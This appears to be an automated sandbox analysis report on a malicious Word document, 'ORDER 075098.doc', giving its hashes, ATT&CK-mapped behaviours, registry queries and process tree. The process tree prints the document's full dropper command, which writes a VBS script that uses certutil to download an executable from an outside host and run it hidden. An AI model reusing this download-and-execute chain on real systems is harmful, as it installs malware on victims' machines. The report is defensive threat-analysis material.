3b44d9aa4abd608f2dd1ec103d734c6402d3cb751dc2f38a46dc682aaa05a6bb

General

Target

ORDER 075098.doc
Size

76KB
MD5

5b112030e331fc27826d844da94384c1
SHA1

345f750a8d23419c626363783a5c97642bbd61c1
SHA256

3b44d9aa4abd608f2dd1ec103d734c6402d3cb751dc2f38a46dc682aaa05a6bb
SHA512

44dd55eb3320996e144e57aa9c5a932b90cb6e05ab83e8a7cb46555cc2753a61352d4b9cddc3c3a3292c6d93d6975f7bccb50e35abde1bb0eef66ad5d4b59b9e
SSDEEP

768:IfCXf5zSe/q6s34bPX0sx8bP55lwNEF2KznO:IfCXf9SEqEXxOTdF9

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4880	4348	cmd.exe	WINWORD.EXE

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3548 timeout.exe
1252 timeout.exe

pid	process
3548	timeout.exe
1252	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings cmd.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4348 WINWORD.EXE
4348 WINWORD.EXE
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

4348 WINWORD.EXE
4348 WINWORD.EXE
4348 WINWORD.EXE
4348 WINWORD.EXE
4348 WINWORD.EXE
4348 WINWORD.EXE
4348 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	cmd.exe

pid	process
4348	WINWORD.EXE
4348	WINWORD.EXE

pid	process
4348	WINWORD.EXE
4348	WINWORD.EXE
4348	WINWORD.EXE
4348	WINWORD.EXE
4348	WINWORD.EXE
4348	WINWORD.EXE
4348	WINWORD.EXE

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

WINWORD.EXEcmd.exeWScript.execmd.exe

description	pid	process	target process
PID 4348 wrote to memory of 4880	4348	WINWORD.EXE	cmd.exe
PID 4348 wrote to memory of 4880	4348	WINWORD.EXE	cmd.exe
PID 4880 wrote to memory of 3548	4880	cmd.exe	timeout.exe
PID 4880 wrote to memory of 3548	4880	cmd.exe	timeout.exe
PID 4880 wrote to memory of 8	4880	cmd.exe	WScript.exe
PID 4880 wrote to memory of 8	4880	cmd.exe	WScript.exe
PID 4880 wrote to memory of 1252	4880	cmd.exe	timeout.exe
PID 4880 wrote to memory of 1252	4880	cmd.exe	timeout.exe
PID 8 wrote to memory of 1768	8	WScript.exe	cmd.exe
PID 8 wrote to memory of 1768	8	WScript.exe	cmd.exe
PID 1768 wrote to memory of 2256	1768	cmd.exe	certutil.exe
PID 1768 wrote to memory of 2256	1768	cmd.exe	certutil.exe
PID 8 wrote to memory of 2232	8	WScript.exe	cmd.exe
PID 8 wrote to memory of 2232	8	WScript.exe	cmd.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER 075098.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://justclickam.com/dxll/ORDER%20075098.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo CreateObject("WScript.Shell").Run "cmd.exe /c %temp%\bin.exe", 0, True >> %temp%\script.vbs && timeout 3 && start %temp%\script.vbs && timeout 3 && del %temp%\script.vbs
2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4880

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:3548

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:8

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f https://justclickam.com/dxll/ORDER%20075098.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\system32\certutil.exe
certutil.exe -urlcache -split -f https://justclickam.com/dxll/ORDER%20075098.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
5⤵
PID:2256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bin.exe
4⤵
PID:2232

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:1252

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\script.vbs
Filesize
301B

MD5
53fadd419d6720431005dc772d84aa40

SHA1
75e4387c8a99acb03a639a55f6b09e4244301953

SHA256
a22ee63ce1b9b8692b52a9e6ddd4522447b90c15cab207576cffcf67833f42f1

SHA512
a8095f4ebf9d7707844a4c28aa3d5e80eb4b2141adcb633be24b2a605ad663aba39888e5e878553d375826aadfa2381c9b2084dda534b708466409685f5aed7a

Download Submit
memory/8-141-0x0000000000000000-mapping.dmp

Download
memory/1252-142-0x0000000000000000-mapping.dmp

Download
memory/1768-144-0x0000000000000000-mapping.dmp

Download
memory/2232-146-0x0000000000000000-mapping.dmp

Download
memory/2256-145-0x0000000000000000-mapping.dmp

Download
memory/3548-140-0x0000000000000000-mapping.dmp

Download
memory/4348-132-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4348-138-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmp

Filesize
64KB

Download
memory/4348-137-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmp

Filesize
64KB

Download
memory/4348-136-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4348-135-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4348-134-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4348-133-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4348-148-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4348-149-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4348-151-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4348-150-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4880-139-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads